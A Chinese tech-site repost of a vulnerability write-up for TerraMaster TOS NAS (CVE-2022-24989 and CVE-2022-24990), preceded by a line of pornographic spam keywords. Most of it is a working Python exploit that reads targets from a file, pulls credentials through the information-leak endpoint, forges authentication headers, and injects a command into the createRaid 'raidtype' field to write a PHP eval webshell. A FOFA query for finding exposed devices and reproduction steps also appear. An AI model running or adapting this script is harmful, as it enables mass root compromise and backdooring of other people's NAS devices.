国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

TerraMaster TOS 遠程命令執(zhí)行(CVE-2022-24989)TerraMaster TOS 敏感信息泄露(CVE-2022-24990)

這篇具有很好參考價值的文章主要介紹了TerraMaster TOS 遠程命令執(zhí)行(CVE-2022-24989)TerraMaster TOS 敏感信息泄露(CVE-2022-24990)。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。


一、漏洞名稱

TerraMaster TOS 遠程命令執(zhí)行(CVE-2022-24989)

TerraMaster TOS 敏感信息泄露(CVE-2022-24990)


二、影響版本

TerraMaster NAS 4.2.x < 4.2.30


三、漏洞危害

遠程命令執(zhí)行 敏感信息泄露


四、POC & EXP ¤

import time, requests,re,hashlib,json


def usage():
    print("""
    用法:poc.py
    前提:在腳本所在文件夾下放入:host.txt  目標
    
    """)

def poc_getinfo(target):
    print("[+]正則檢測:{}".format(target))
    headers = {"User-Agent": "TNAS"}
    payload = target + "/module/api.php?mobile/webNasIPS"
    try:
        req = requests.get(url=payload, headers=headers).content.decode("utf-8")
        if "successful" in req:
            print("[+]存在信息泄露漏洞:{}".format(payload))
            print('    [-]泄露信息:' + req)
            with open("poc1_vul.txt", "a+", encoding="utf-8") as f:
                f.write(payload + '\n')
            poc_execute(req,target)
    except:
        pass


def poc_execute(req,target):
    print("[+]開始進行命令執(zhí)行檢測---")
    req = str(req)
    mac = str(re.findall(r"ADDR:(.*?)\\", req)[0][-6:])
    authorization = re.findall(r"PWD:(.*?)\\", req)[0]
    timestamp = str(int(time.time()))
    signature = hashlib.md5((mac + timestamp).encode("utf-8")).hexdigest()
    webshell_name = "qLsvVqr.php"	#shell文件名稱
    webshell_pass = "ant"			#shell密碼
    command = 'echo \'<?php @eval($_POST["' + webshell_pass + '"]);?>\'>' + webshell_name
    data = {'raidtype': ';'+command, 'diskstring': 'XXXX'}
    headers = {"Authorization": authorization, "Signature": signature, "Timestamp": timestamp, "User-Agent": "TNAS"}
    payload = target+ '/module/api.php?mobile/createRaid'
    req2 = requests.post(url=payload,headers=headers,data=data).content.decode("utf-8")
    if "successful" in req2:
        print("[+]命令執(zhí)行成功,成功寫入shell文件,文件地址:{}".format(target+'/module/qLsvVqr.php'))


if __name__ == '__main__':
    usage()
    with open("host.txt", 'r', encoding="utf-8") as f:
        temp = f.readlines()
    for target in temp:  # 此處可以遍歷url文件
        target = target.strip().rstrip("/")
        poc_getinfo(target)

五、資產搜索

fofa: app=“TERRAMASTER-NAS”


六、漏洞背景 / 參考 / 延申

TerraMaster TOS 可能允許經過身份驗證的遠程攻擊者在系統(tǒng)上執(zhí)行任意命令,這是由 createRaid 模塊中的缺陷引起的。通過發(fā)送特制命令,攻擊者可以利用此漏洞在系統(tǒng)上以 root 身份執(zhí)行任意命令。


七、漏洞復現步驟 ¤

*原理

遠程命令執(zhí)行漏洞是由信息泄露漏所引發(fā)的,借由泄露的信息構造新的header,構造mac Authorization Signature Timestamp這四個參數,發(fā)送新的請求完成遠程命令執(zhí)行。

* 方法

1、使用fofa搜尋存在漏洞的資產
TerraMaster TOS 遠程命令執(zhí)行(CVE-2022-24989)TerraMaster TOS 敏感信息泄露(CVE-2022-24990)

2、訪問首頁發(fā)現存在漏洞。
TerraMaster TOS 遠程命令執(zhí)行(CVE-2022-24989)TerraMaster TOS 敏感信息泄露(CVE-2022-24990)

3、使用poc上傳shell
TerraMaster TOS 遠程命令執(zhí)行(CVE-2022-24989)TerraMaster TOS 敏感信息泄露(CVE-2022-24990)

4、shell成功執(zhí)行。
TerraMaster TOS 遠程命令執(zhí)行(CVE-2022-24989)TerraMaster TOS 敏感信息泄露(CVE-2022-24990)

八、避坑情況 / 問題匯總


九、修復建議

更新至最新版4.2.31 或更高版本文章來源地址http://www.zghlxwxcb.cn/news/detail-438914.html

到了這里,關于TerraMaster TOS 遠程命令執(zhí)行(CVE-2022-24989)TerraMaster TOS 敏感信息泄露(CVE-2022-24990)的文章就介紹完了。如果您還想了解更多內容,請在右上角搜索TOY模板網以前的文章或繼續(xù)瀏覽下面的相關文章,希望大家以后多多支持TOY模板網!

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。如若轉載,請注明出處: 如若內容造成侵權/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經查實,立即刪除!

領支付寶紅包贊助服務器費用

相關文章

  • Cacti命令執(zhí)行漏洞復現(CVE-2022-46169)

    Cacti命令執(zhí)行漏洞復現(CVE-2022-46169)

    Cacti項目是一個開源平臺,可為用戶提供強大且可擴展的操作監(jiān)控和故障管理框架。在1.2.22版本中存在一處命令注入漏洞,攻擊者可以通過X-Forwarded-For請求頭繞過服務端校驗并在其中執(zhí)行任意命令。漏洞編號:CVE-2022-46169,漏洞等級:嚴重。 影響版本 Cacti == 1.2.22 不受影響版本

    2024年02月02日
    瀏覽(21)
  • [JAVA安全]CVE-2022-33980命令執(zhí)行漏洞分析

    [JAVA安全]CVE-2022-33980命令執(zhí)行漏洞分析

    在 i春秋的漏洞靶標上看見了此漏洞,所以前來分析一下漏洞原理,比較也是去年 7月的漏洞。 漏洞描述:Apache官方發(fā)布安全公告,修復了一個存在于Apache Commons Configuration 組件的遠程代碼執(zhí)行漏洞,漏洞編號:CVE-2022-33980,漏洞威脅等級:高危。惡意攻擊者通過該漏洞,可在

    2024年02月15日
    瀏覽(22)
  • 【漏洞復現】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)

    【漏洞復現】Microsoft Office MSDT 遠程代碼執(zhí)行漏洞 (CVE-2022-30190)

    0x01 Microsoft Office Microsoft Office是由Microsoft(微軟)公司開發(fā)的一套辦公軟件套裝。常用組件有 Word、Excel、PowerPoint等。 0x02 漏洞簡介 該文檔使用 Word 遠程模板功能從遠程網絡服務器檢索 HTML 文件,該服務器使用 ms-msdt MSProtocol URI 方案加載代碼并執(zhí)行 PowerShell,禁用宏,仍能通過

    2024年02月05日
    瀏覽(19)
  • 漏洞深度分析|CVE-2022-1471 SnakeYaml 命令執(zhí)行漏洞

    漏洞深度分析|CVE-2022-1471 SnakeYaml 命令執(zhí)行漏洞

    YAML是一種數據序列化格式,設計用于人類的可讀性和與腳本語言的交互。 SnakeYaml是一個完整的YAML1.1規(guī)范Processor,支持UTF-8/UTF-16,支持Java對象的序列化/反序列化,支持所有YAML定義的類型。 https://github.com/snakeyaml/snakeyaml SnakeYaml通常使用方法如下: new Yaml(new Constructor(TestDataC

    2023年04月27日
    瀏覽(30)
  • Goby漏洞更新 | PbootCMS 3.1.2 遠程代碼執(zhí)行漏洞(CVE-2022-32417)

    Goby漏洞更新 | PbootCMS 3.1.2 遠程代碼執(zhí)行漏洞(CVE-2022-32417)

    PbootCMS是PbootCMS個人開發(fā)者的一款使用PHP語言開發(fā)的開源企業(yè)建站內容管理系統(tǒng)(CMS)。PbootCMS 3.1.2版本中存在安全漏洞,攻擊者可通過該漏洞引發(fā)代碼遠程執(zhí)行。 PbootCMS 3.1.2版本中存在安全漏洞,攻擊者可通過該漏洞引發(fā)代碼遠程執(zhí)行。 FOFA查詢語句(點擊直接查看結果):

    2024年02月04日
    瀏覽(18)
  • CVE-2022-21907 Microsoft Windows HTTP 協(xié)議棧遠程代碼執(zhí)行漏洞復現

    CVE-2022-21907 Microsoft Windows HTTP 協(xié)議棧遠程代碼執(zhí)行漏洞復現

    目錄 0x01 聲明: 0x02 簡介: 0x03 漏洞概述: 0x04 影響版本: 0x05 環(huán)境搭建: 下載: 開啟IIS: 0x06 漏洞復現: 利用POC: 0x07 流量分析: 客戶端: 0x08 修復建議: ????????僅供學習參考使用,請勿用作違法用途,否則后果自負。 ????????Microsoft Windows HTTP 協(xié)議棧(HTTP.

    2024年02月03日
    瀏覽(16)
  • Microsoft Remote Procedure Call Runtime 遠程代碼執(zhí)行漏洞(CVE-2022-26809)

    Microsoft Remote Procedure Call Runtime 遠程代碼執(zhí)行漏洞(CVE-2022-26809)

    CVE 描述 CVE-2022-26809 - 核心 Windows 組件 (RPC) 的弱點獲得 9.8 的 CVSS 分數并非沒有原因,因為攻擊不需要身份驗證并且可以通過網絡遠程執(zhí)行,并且可能導致遠程代碼執(zhí)行 ( RCE) 具有 RPC 服務的權限,這取決于托管 RPC 運行時的進程。運氣好的話,這個嚴重的錯誤允許訪問運行 S

    2024年02月05日
    瀏覽(25)
  • Windows支持診斷工具(MSDT)遠程代碼執(zhí)行漏洞:CVE-2022-30190學習及復現

    Windows支持診斷工具(MSDT)遠程代碼執(zhí)行漏洞:CVE-2022-30190學習及復現

    Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability對應的cve編號為CVE-2022-30190,其能夠在非管理員權限、禁用宏且在windows defender開啟的情況下繞過防護,達到上線的效果。 當從Word等應用程序使用 URL 協(xié)議調用 MSDT 時存在遠程執(zhí)行代碼漏洞,攻擊者通過制作惡意的

    2024年02月08日
    瀏覽(44)
  • GoAhead遠程命令執(zhí)行漏洞(CVE-2021-42342)

    GoAhead遠程命令執(zhí)行漏洞(CVE-2021-42342)

    目錄 GoAhead遠程命令執(zhí)行漏洞(CVE-2021-42342) 漏洞描述 漏洞復現 啟動環(huán)境 復現漏洞 漏洞主要是由于上傳過濾器沒有設置不受信任的var位繞過CGI處理程序的前綴檢測,滲透人員可以利用這個漏洞在未授權的情況下,構造惡意程序數據執(zhí)行遠程命令執(zhí)行攻擊,進而獲得服務器的最

    2024年02月09日
    瀏覽(25)
  • CVE-2022-30190分析以及復現和POC利用 //Microsoft Office MSDT 遠程代碼執(zhí)行漏洞

    CVE-2022-30190分析以及復現和POC利用 //Microsoft Office MSDT 遠程代碼執(zhí)行漏洞

    在微軟官方的介紹里,是從 Word 等調用應用程序使用 URL 協(xié)議調用 MSDT 時存在遠程執(zhí)行代碼漏洞。成功利用此漏洞的攻擊者可以使用調用應用程序的權限運行任意代碼。 意思是惡意 Word 文檔可以使用遠程模板功能從遠程服務器獲取 HTML 文件,并且 HTML 代碼可以使用 Microsoft 的

    2024年02月04日
    瀏覽(69)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領取紅包,優(yōu)惠每天領

二維碼1

領取紅包

二維碼2

領紅包